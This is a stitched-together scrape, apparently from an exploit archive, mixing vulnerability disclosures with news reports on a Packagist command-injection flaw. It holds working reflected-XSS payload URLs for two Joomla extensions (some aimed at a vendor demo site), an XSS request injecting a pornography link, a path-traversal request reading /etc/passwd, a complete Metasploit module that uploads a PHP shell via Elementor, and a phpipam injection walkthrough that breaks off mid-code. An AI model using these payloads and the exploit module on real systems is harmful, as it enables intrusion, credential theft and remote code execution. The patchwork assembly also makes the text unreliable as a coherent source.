Joomla JoomBri Freelance extension version 4.5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Joomla JoomBri Freelance 4.5.0                                             ││  Software : JoomBri Team                                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'keyword' is vulnerable to XSShttps://target.com/index.php?keyword=xfz9b%22onfocus%3d%22alert(1)%22autofocus%3d%22nyn0r[-] Done

Joomla JoomBri Freelance 4.5.0 Cross Site Scripting

Argument injection bug posed RCE risk

One of the important components of Composer, the main package manager for PHP applications, contained a vulnerability that could have been abused to attack coding repositories, researchers at SonarSource have found.

Packagist, the vulnerable component, enables Composer to determine and download software dependencies that software developers include in their projects. Composer serves approximately two billion software packages every month.

The vulnerability might potentially have been exploited to distribute malicious backdoored packages to servers, a technical blog post by SonarSource explains.

An estimated 3500,000 dependencies were threatened by the security flaw.

Fortunately, the vulnerability was resolved by project maintainers only hours after it was reported.

**Argument injection**

The new bug comes a year after SonarSource discovered and reported another supply chain attack vulnerability in Packagist. The previous bug was in the classes that interact with version control systems (VCS) like Git, Mercurial, and Subversion to resolve dependencies from code repositories.

While that vulnerability was patched by the maintainers of Packagist, SonarSource researchers found that other parts of the same class implementations were still prone to potential attack.

“Our previous research helped us navigate quickly to the juicy sections of the code base, but at the same time, we’ve missed this bug several times when reviewing code and patches related to our previous discovery,” Thomas Chauchefoin, a vulnerability researcher at SonarSource, told The Daily Swig.

To display information about packages, Packagist reads content from readme.md or a user-specified file in the code repository. Packagist contains separate implementations to retrieve file data from different VCS systems. Each of these implementations composes a shell command that includes content from the user-supplied file.

According SonarSource, if an attacker inserted malicious commands in the information file, they would be inserted as arguments in the shell command that ran on the system. And although Packagist uses escaping mechanisms to stop malicious code, it left some gaps open.

**Supply chain attack**

In a proof-of-concept video, the researchers show how the vulnerability can be exploited to run arbitrary commands on the server.

The attacker could abuse the bug to modify the definition of a package and point it to an unintended destination, tainting the software development pipeline in the process.

“Defending against argument injection bugs is very unusual compared to all the techniques we’ve been pushing to developers in the past decade, and I think that’s why we’ve been finding them a lot,” Chauchefoin commented.

“Third-party data can be encoded, escaped, and tightly validated, but that’s often not enough!”

**Protect yourself**

The bug was patched shortly after SonarSource reported it to Packagist. If you are using the default official Packagist instance or Private Packagist, you are already safe. If you have integrated Composer as a library and operate on untrusted repositories, you must upgrade to one of the patched versions of the library.

“Nothing changed in the year after our previous discovery, which is understandable as these are vital projects with years of work behind them,” Chauchefoin said.

“Enforcing features like the signing of any build artifact (i.e., packages) would likely introduce non-trivial changes to the workflows of millions of developers.”

Meanwhile, Chauchefoin expressed hope that more traction around new standards like sigstore might help mitigate the risks of supply chain attacks.

“Ideally, package managers should only be tubes between the maintainers and package users, and there should be no way to tamper with what's flowing inside. Signing everything is the key, and sigstore makes it much more affordable,” he said.

RELATED Nepxion Discovery software with Spring Cloud functionality fails to patch RCE, info leak bugs

PHP package manager component Packagist vulnerable to compromise

Canteen Management version 1.0-2022 suffers from a cross site scripting vulnerability.

## Title: Canteen-Management-1.0-2022 suffers from XSS-Reflected  
## Author: nu11secur1ty  
## Date: 10.04.2022  
## Vendor: https://www.mayurik.com/  
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

## Description:  
The Canteen-Management-1.0-2022 suffers from XSS-Reflected vulnerability.  
The name of an arbitrarily supplied URL parameter is copied into the  
value of an HTML tag attribute which is encapsulated in double  
quotation marks.  
The attacker can craft a very malicious HTTPS URL redirecting to a  
very malicious URL. When the victim clicks into this crafted URL the  
game will over for him.

STATUS: High vulnerability

[+]Payload REQUEST:

```HTML  
GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me  
HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
```

[+]Payload RESPONSE:

```burp  
HTTP/1.1 200 OK  
Date: Tue, 04 Oct 2022 09:44:55 GMT  
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6  
X-Powered-By: PHP/8.1.6  
Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 6140  
Connection: close  
Content-Type: text/html; charset=UTF-8

<link rel="stylesheet" href="assets/css/popup_style.css">  
           <style>  
.footer1 {  
  position: fixed;  
  bottom: 0;  
  width: 100%;  
  color: #5c4ac7;  
  text-align: center;  
}

</style>  
   <!DOCTYPE html>  
<html lang="en">

<head>  
    <meta charset="utf-8">  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

<meta charset="utf-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0,  
user-scalable=0, minimal-ui">  
<meta http-equiv="X-UA-Compatible" content="IE=edge" />  
<meta name="description" content="">  
<meta name="keywords" content="">  
<meta name="author" content="">

    <link rel="icon" type="image/png" sizes="16x16"  
href="assets/uploadImage/Logo/favicon.png">

             <style type="text/css">  
@media print {  
    #printbtn {  
        display :  none;  
    }  
}  
</style>  
    <title>Youthappam Canteen Management System - by Mayuri K.  
Freelancer</title>

  <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">  
  <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />  
    <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" />

    <link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet">

    <link href="assets/css/helper.css" rel="stylesheet">  
    <link href="assets/css/style.css" rel="stylesheet">  
 <link rel="stylesheet"  
href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />  
 <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">  
    <link href="assets/css/lib/calendar2/pignose.calendar.min.css"  
rel="stylesheet">  
     <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">  
     <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css"  
rel="stylesheet">

    <script type="text/javascript"  
src="https://www.gstatic.com/charts/loader.js"></script>  
    <script type="text/javascript">  
      google.charts.load("current", {packages:["corechart"]});  
      google.charts.setOnLoadCallback(drawChart);  
      function drawChart() {  
        var data = google.visualization.arrayToDataTable([  
          ['Food', 'Average sale per Day'],  
          ['Masala dosa',     11],  
          ['Chicken 65 ',      2],  
          ['Karapu Boondi',  2],  
          ['Bellam Gavvalu', 2],  
          ['Gummadikaya Vadiyalu',    7]  
        ]);

        var options = {  
          title: 'Food Average Sale per Day',  
          pieHole: 0.4,  
        };

        var chart = new  
google.visualization.PieChart(document.getElementById('donutchart'));  
        chart.draw(data, options);  
      }  
    </script>  
</head>

<body class="fix-header fix-sidebar">

<div id="page"></div>  
<div id="loading"></div>

    <div id="main-wrapper">  
        <div class="unix-login">

            <div class="container-fluid" style="background-image:  
url('assets/myimages/background.jpg');  
 background-color: #ffffff;background-size:cover">  
                <div class="row">  
                    <div class="col-lg-4 ml-auto">  
                        <div class="login-content">  
                            <div class="login-form">  
                                <center><img  
src="./assets/uploadImage/Logo/logo.png" style="width:  
100%;"></center><br>  
                                <form  
action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"  
target="_blank" rel="noopener nofollow ugc"> <img  
src="https:/raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"  
method="post" id="loginForm">  
                                    <div class="form-group">

                                        <input type="text"  
name="username" id="username" class="form-control"  
placeholder="Username" required="">

                                    </div>  
                                    <div class="form-group">

                                        <input type="password"  
id="password" name="password" class="form-control"  
placeholder="Password" required="">  
                                    </div>

                                    <button type="submit" name="login"  
class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign  
in</button>

                                

<div class="forgot-phone text-left f-left">  
<a href = "mailto:mayuri.infospace@gmail.com?subject = Project  
Development Requirement&body = I saw your projects. I want to develop  
a project" class="text-right f-w-600"> Click here to contact me</a>  
</div>  
                                </form>  
                            </div>  
                        </div>  
                    </div>  
                </div>  
            </div>  
        </div>  
    </div>

    <script src="./assets/js/lib/jquery/jquery.min.js"></script>

    <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script>  
    <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script>

    <script src="./assets/js/jquery.slimscroll.js"></script>

    <script src="./assets/js/sidebarmenu.js"></script>

    <script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>

    <script src="./assets/js/custom.min.js"></script>  
    <script>

function onReady(callback) {  
    var intervalID = window.setInterval(checkReady, 1000);  
    function checkReady() {  
        if (document.getElementsByTagName('body')[0] !== undefined) {  
            window.clearInterval(intervalID);  
            callback.call(this);  
        }  
    }  
}

function show(id, value) {  
    document.getElementById(id).style.display = value ? 'block' : 'none';  
}

onReady(function () {  
    show('page', true);  
    show('loading', false);  
});  
    </script>  
</body>

</html>  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management)

## Proof and Exploit:  
[href](https://streamable.com/emg0zo)

## More:  
[href](https://www.nu11secur1ty.com/)

Done:

На вт, 4.10.2022 г. в 23:24 ч. nu11 secur1ty <nu11secur1typentest@gmail.com>  
написа:

> Tomorow I will send to you. BR  
>  
> On Tue, Oct 4, 2022, 19:11 Packet Storm <packet@packetstormsecurity.com>  
> wrote:  
>  
>> Missing submission  
>>  
>> On Tue, Oct 04, 2022 at 02:23:16PM +0300, nu11 secur1ty wrote:  
>> >  
>> https://www.nu11secur1ty.com/2022/10/example-of-professional-penetration.html  
>> >  
>> https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management  
>> > --  
>> > System Administrator - Infrastructure Engineer  
>> > Penetration Testing Engineer  
>> > Exploit developer at https://packetstormsecurity.com/  
>> > https://cve.mitre.org/index.html and https://www.exploit-db.com/  
>> > home page: https://www.nu11secur1ty.com/  
>> > hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
>> >                           nu11secur1ty <http://nu11secur1ty.com/>  
>>  
>

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

Canteen Management 1.0-2022 Cross Site Scripting

WordPress WPvivid Backup plugin versions prior to 0.9.76 suffer from a path traversal vulnerability.

=====[ Tempest Security Intelligence - ADV-15/2022  
]==========================

Wordpress plugin - WPvivid Backup - Version < 0.9.76

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Limitation of a Pathname to a Restricted Directory  
('Path Traversal')  
 ('Path Traversal') [CWE-22]

 * CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
 * CVSS Base Score 7.2

=====[ Overview]========================================================  
 * System affected : Wordpress plugin - WPvivid Backup  
 * Software Version : Version < 0.9.76  
 * Impacts : The plugin WPvivid Backup does not sanitise and validate a  
parameter before using it to read the content of a file, allowing high  
privilege users to read any file from the web server via a Traversal attack.

=====[ Detailed  
description]=================================================  
 * Steps to reproduce

1 - Authenticated as privilege user, copy the request below, change the  
placeholder {{nonce}} with a valid nonce:  
 ```

https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922  
 ```

=====[ Timeline of  
disclosure]===============================================

11/Aug/2022 - Responsible disclosure was initiated with the vendor.  
15/Aug/2022 - WPvivid Support confirmed the issue.  
16/Aug/2022 - WPvivid Support fix the issue.  
08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863.

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [5]

=====[ References ]=====================================================

[1][ [  
https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html  
]]  
[2][ [  
https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a  
[3][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
[4][ [  
https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]]  
]  
[5][ [Thanks FXO,ACPM,MFPP]]

=====[ EOF ]===========================================================  
--

WordPress WPvivid Backup Path Traversal

WordPress Elementor plugin versions 3.6.0 through 3.6.2 suffer from a remote shell upload vulnerability. This is achieved by sending a request to install Elementor Pro from a user supplied zip file. Any user with Subscriber or more permissions is able to execute this.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wordpress Plugin Elementor Authenticated Upload Remote Code Execution',        'Description' => %q{          The WordPress plugin Elementor versions 3.6.0 - 3.6.2, inclusive have a vulnerability          that allows any authenticated user to upload and execute any PHP file. This is achieved          by sending a request to install Elementor Pro from a user supplied zip file.          Any user with Subscriber or more permissions is able to execute this.          Tested against Elementor 3.6.1        },        'License' => MSF_LICENSE,        'Author' => [          'Ramuel Gall', # Discovery          'AkuCyberSec', # Exploit-db          'h00die' # Metasploit module        ],        'References' => [          ['EDB', '50115'],          ['CVE', '2022-1329'],          ['URL', 'https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/'],          ['URL', 'https://www.youtube.com/watch?v=tIhN1svzAYk'] # great video about the exploit        ],        'Platform' => [ 'php' ],        'Arch' => ARCH_PHP,        'Targets' => [          [ 'Wordpress Elementor', {}]        ],        'Privileged' => false,        'DisclosureDate' => '2022-03-29',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options [      OptString.new('USERNAME', [true, 'Username of a subscriber or higher account', '']),      OptString.new('PASSWORD', [true, 'Password of a subscriber or higher account', '']),      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])    ]  end  def check    unless wordpress_and_online?      return CheckCode::Safe('Server not online or not detected as Wordpress')    end    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])    CheckCode::Safe('Invalid credentials given!') unless cookie    return check_plugin_version_from_readme('elementor', '3.6.3', '3.6.0')  end  def upload_file(nonce, cookie)    zip_file = Rex::Zip::Archive.new    payload_name = 'elementor-pro.php'    print_status("Payload file name: #{payload_name}")    # we end up in wp-admin, so we need to get to the right folder    register_dirs_for_cleanup('../wp-content/plugins/elementor-pro')    # payload must contain a Plugin Name header with the name of the plugin    pload = "<?php\n"    pload << "/**\n"    pload << "* Plugin Name: Elementor Pro\n"    pload << "*/\n"    pload << payload.encoded.gsub('/*<?php /**/ ', '')    pload << "\n?>"    zip_file.add_file("/elementor-pro/#{payload_name}", pload)    vars_form_data = [      # post_data.add_part('elementor_upload_and_install_pro', nil, nil, 'form-data; name="action"')      {        'name' => 'action',        'data' => 'elementor_upload_and_install_pro'      },      # post_data.add_part(nonce, nil, nil, 'form-data; name="_nonce"')      {        'name' => '_nonce',        'data' => nonce      },      # post_data.add_part(zip_file.pack, 'application/x-zip-compressed', 'binary', 'form-data; name="fileToUpload"; filename="elementor-pro.zip"')      {        'name' => 'fileToUpload',        'data' => zip_file.pack,        'encoding' => 'binary',        'filename' => 'elementor-pro.zip',        'mime_type' => 'application/x-zip-compressed'      }    ]    resp = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'cookie' => cookie,      'vars_form_data' => vars_form_data    )    # we get a timeout on success    if resp.nil?      print_good('Payload Uploaded Successfully')      return    end    fail_with(Failure::UnexpectedReply, 'Error uploading payload')  end  def get_nonce(cookie)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'profile.php'),      'cookie' => cookie    )    unless res && (res.code == 200)      fail_with(Failure::UnexpectedReply, "Could not get the nonce (#{res.code})")    end    # find the RIGHT nonce, there are many nonces on the page, but we need the admin-ajax one    res.body.scan(/admin-ajax.php","nonce":"([a-z0-9]+)"/)[0][0].to_s  end  def exploit    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie    cookie = cookie.gsub('wordpress_test_cookie=WP%20Cookie%20check; ', '')    print_status('Looking for nonce')    nonce = get_nonce(cookie)    fail_with(Failure::NoAccess, 'Unable to find nonce') if nonce.nil?    print_good("Nonce: #{nonce}")    print_status('Uploading upgrade payload and activating...')    upload_file(nonce, cookie)  endend

WordPress Elementor 3.6.2 Shell Upload

Joomla Solidres extension version 2.12.9 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                      [ Exploits ]                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : extensions.joomla.org                                                      │  
│  Vendor   : Solidres Team                                                              │  
│  Software : Joomla Solidres 2.12.9                                                     │  
│  Vuln Type: Reflected XSS                                                              │  
│  Method   : GET                                                                        │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2022                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

GET parameter 'prices' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/

https://demo.solidres.com/joomla/greenery_hub/index.php/en/?option=com_solidres&task=hub.updateFilter&location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&prices=cqsw4%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22jlc4w&stars=4&

GET parameter 'location' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=a8s3m%22%3e%3cscript%3ealert(1)%3c%2fscript%3esnein&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_quantity' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=h32cq%22%3e%3cscript%3ealert(1)%3c%2fscript%3etzlez&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_opt[1][adults]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=qa0is%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekvqtk&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_opt[1][children]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=xcpf7%22%3e%3cscript%3ealert(1)%3c%2fscript%3exhufo&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'start' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=m85s0%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu48v0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'Itemid' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=t2ofl%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyf30r&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

[-] Done

Joomla Solidres 2.12.9 Cross Site Scripting

Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks.
"This vulnerability allows gaining control of Packagist," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager

Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks.

"This vulnerability allows gaining control of Packagist," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager Composer to determine and download software dependencies that are included by developers in their projects.

The disclosure comes as planting malware in open source repositories is turning into an attractive conduit for mounting software supply chain attacks.

Tracked as CVE-2022-24828 (CVSS score: 8.8), the issue has been described as a case of command injection and is linked to another similar Composer bug (CVE-2021-29472) that came to light in April 2021, suggesting an inadequate patch.

"An attacker controlling a Git or Mercurial repository explicitly listed by URL in a project's composer.json can use specially crafted branch names to execute commands on the machine running composer update," Packagist disclosed in an April 2022 advisory.

A successful exploitation of the flaw meant that requests to update a package could have been hijacked to distribute malicious dependencies by executing arbitrary commands on the backend server running the official instance of Packagist.

"Compromising \[the backend services\] would allow attackers to force users to download backdoored software dependencies the next time they do a fresh install or an update of a Composer package," Chauchefoin explained.

That said, there is no evidence the vulnerability has been exploited to date. Fixes have been deployed in Composer versions 1.10.26, 2.2.12, and 2.3.5 after SonarSource reported the flaw on April 7, 2022.

Open source code has increasingly become a lucrative target of choice for threat actors owing to the ease with which they can be weaponized against the software supply chain.

Earlier this April, SonarSource also detailed a 15-year-old security flaw in the PEAR PHP repository that could permit an attacker to obtain unauthorized access and publish rogue packages and execute arbitrary code.

"While supply chains can take different forms, one of them is significantly more impactful: By gaining access to the servers distributing these third-party software components, threat actors can alter them to obtain a foothold in the systems of their users," Chauchefoin said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Report Supply Chain Vulnerability in Packagist PHP Repository

phpipam v1.5.0 was discovered to contain a header injection vulnerability via the component /admin/subnets/ripe-query.php.

<?php
//In file https://github.com/phpipam/phpipam/blob/master/app/admin/subnets/ripe-query.php
//line 21
// the source is $\_POST\[‘subnet’\]
$res = $Subnets\->resolve\_ripe\_arin ($\_POST\['subnet'\]);

//In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
//line 3523
public function resolve\_ripe\_arin ($subnet) {
    // ...
    // Note: We can bypass the check by choosing the value in this format
    // \[the correct value for $subnet\_check\]\[.\]\[injection value\]
    //so reset will take the first value of tje explode and the condition will be true
    // take only first bit of ip address to match /8 delegations
    $subnet\_check = reset(explode(".", $subnet));
    // ripe or arin?
    if (in\_array($subnet\_check, $this\->ripe)){ 
        // the injection in $subnet
        return $this\->query\_ripe ($subnet); 
    }
    //...
}

// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 3545
private function query\_ripe ($subnet) {
    // ripe\_arin\_fetch method will be called
    $ripe\_result = $this\->identify\_address ($subnet)=="IPv4" ? $this\->ripe\_arin\_fetch ("ripe", "inetnum", $subnet) : $this\->ripe\_arin\_fetch ("ripe", "inet6num", $subnet);
    // ...
}
// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 3633
private function ripe\_arin\_fetch ($network, $type, $subnet) {
    // set url
    // $subnet is added to $url without sanitization
    // which can go backward in the directory ../../admin/
    $url = $network\=="ripe" ? https://rest.db.ripe.net/ripe/$type/$subnet : https://whois.arin.net/rest/nets;q=$subnet?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2;

    $result = $this\->curl\_fetch\_url($url, \["Accept: application/json"\]);

    $result\['result'\] = json\_decode($result\['result'\]);

    // result
    return $result;
}

// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 1443
// the execution for the curl
public function curl\_fetch\_url($url, $headers\=false, $timeout\=30) {
    $result = \['result'\=>false, 'result\_code'\=>503, 'error\_msg'\=>''\];

    //...

    try {
        $curl = curl\_init();
        // Note: $url is not sanitized
        curl\_setopt($curl, CURLOPT\_URL, $url);
        //....

        $result\['result'\]      = curl\_exec($curl);
        $result\['result\_code'\] = curl\_getinfo($curl, CURLINFO\_HTTP\_CODE);
        $result\['error\_msg'\]   = curl\_error($curl);

        // close
        curl\_close ($curl);

    } catch (Exception $e) {
